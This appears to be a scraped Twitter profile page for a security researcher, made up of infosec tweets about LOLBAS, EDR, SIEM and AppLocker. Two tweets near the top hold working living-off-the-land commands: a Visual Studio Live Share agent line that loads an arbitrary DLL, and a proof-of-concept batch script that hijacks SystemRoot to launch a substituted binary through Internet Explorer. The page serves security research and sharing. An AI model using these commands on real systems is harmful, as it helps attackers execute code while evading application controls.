Conor Richard (@xenoscr) 's Twitter Profile
Conor Richard

@xenoscr

Cyber, OSCE, OSWE, OSCP Certified, Knowledge Seeker, and my opinions are my own.

ID: 2972506167

Link: https://blog.xenoscr.net/

Date: 11-01-2015 04:26:29

3,3K Tweet

1,1K Followers

651 Following

bohops (@bohops) 's Twitter Profile Photo

The "Visual Studio Live Share" binary is a fun #LOLBIN  to load an arbitrary DLL from the cmdline:

vsls-agent.exe --agentExtensionPath c:\path\to\your.dll
¬ whickey (@notwhickey) 's Twitter Profile Photo

Have you ever considered Internet Explorer to be a #lolbin? 
By navigating to URI: `shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}` you can spawn `rstrui.exe` (System Restore). 
If you modify the `SystemRoot` environment variable and copy over DLLs you can run whatever you like.
¬ whickey (@notwhickey) 's Twitter Profile Photo

POC:

mkdir %temp%\System32
FOR /R C:\Windows\System32\ %F IN (*.dll) DO COPY "%F" %temp%\System32\ /Y >NUL
set a=C:\Windows\System32\calc.exe
copy %a% %temp%\System32\rstrui.exe /Y > NUL
set SystemRoot=%temp%
start iexplore shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}

Dave Kennedy (@hackingdave) 's Twitter Profile Photo

Good life lesson: Hurt people, hurt people. 

Took me a while to not worry or care about the people that aren’t happy for others' successes or for others' positivity to help people or make a positive difference in others' lives.

They are the unhappy ones. I hope they find happiness.
Conor Richard (@xenoscr) 's Twitter Profile Photo

Not saying I'm moving but just in case, I joined mastodon as: https://ioc[.]exchange/web/Conor Richard

Anyone that I follow here or who follows me, I'd be happy to connect.

Intel 471 (@intel471inc) 's Twitter Profile Photo

Intel 471 is deeply saddened by the tragic news of Vitali Kremez's untimely passing. We extend our deepest condolences to his family, friends and his Advance Intelligence Team during this challenging time.

bohops (@bohops) 's Twitter Profile Photo

#LOLBAS hit 5000 stars on GitHub to bring in the New Year! Thank you all for the support over the years - it truly is a community project! Big shout out to Oddvar Moe🙏, Conor Richard, Chris Spehn, liam, Wietze, and Jose Enrique Hernandez for all the hard work to keep it going!

bohops (@bohops) 's Twitter Profile Photo

The leap that it takes to publicly share infosec knowledge/content is generally underappreciated. Often, folks who want to share with the community do not out of anxiety/fear of acceptance/etc. And then, there is the asymmetry of those who share offensive content vs defensive.

bohops (@bohops) 's Twitter Profile Photo

I guess the general points are:
- We need more people to contribute to the profession
- We need to encourage people to share (coaching and validation are acceptable)
- The community that shares defensive content is smaller IMO. It would be great to see others in this space

Mohamed El Azaar (@med0x2e) 's Twitter Profile Photo

Justin Elze Some immature companies (ex; no SIEM or whatever) tend to go for RTs before PTs for leverage. mainly to get management to take a seat in the same room, listen, and take security more seriously ($$$).

Dune Quotes (@dunequotebot) 's Twitter Profile Photo

Once men turned their thinking over to machines in the hope that this would set them free. But that only permitted other men with machines to enslave them.

Jeffrey Snover (@jsnover) 's Twitter Profile Photo

Priorities are not what you say, they are what you fund. Culture is not what you say, it's what you reward. Action is a lie detector.

Moose (@litmoose) 's Twitter Profile Photo

Show me a person who blames the EDR, and 9.9 times out of 10 I'll show you someone who doesn't understand:

DNS FW rules Noisy Dev jobs GPO Gapping Bad config Scanners

You need something on your endpoints that auto-blocks crud, but you still have to fix your internal problems.

Claudio Criscione (@paradoxengine) 's Twitter Profile Photo

Repeat after me: vulnerability management is not incident response. We see an RCE a week, why do we randomly select a few to be OMGTHISBAD and scramble? All those other RCEs being discriminated are sad... and still popping you.

Dr. Anton Chuvakin (@anton_chuvakin) 's Twitter Profile Photo

I love detection engineering, I think it is awesome and hugely needed, and it's the future and all that. But I have no idea how to talk about it to a team of 1 (ONE) running a SIEM ...

Oddvar Moe (@oddvarmoe) 's Twitter Profile Photo

Well well! Microsoft removed the Windows version checks to use AppLocker! Everyone can now use AppLocker! support.microsoft.com/en-us/topic/kb…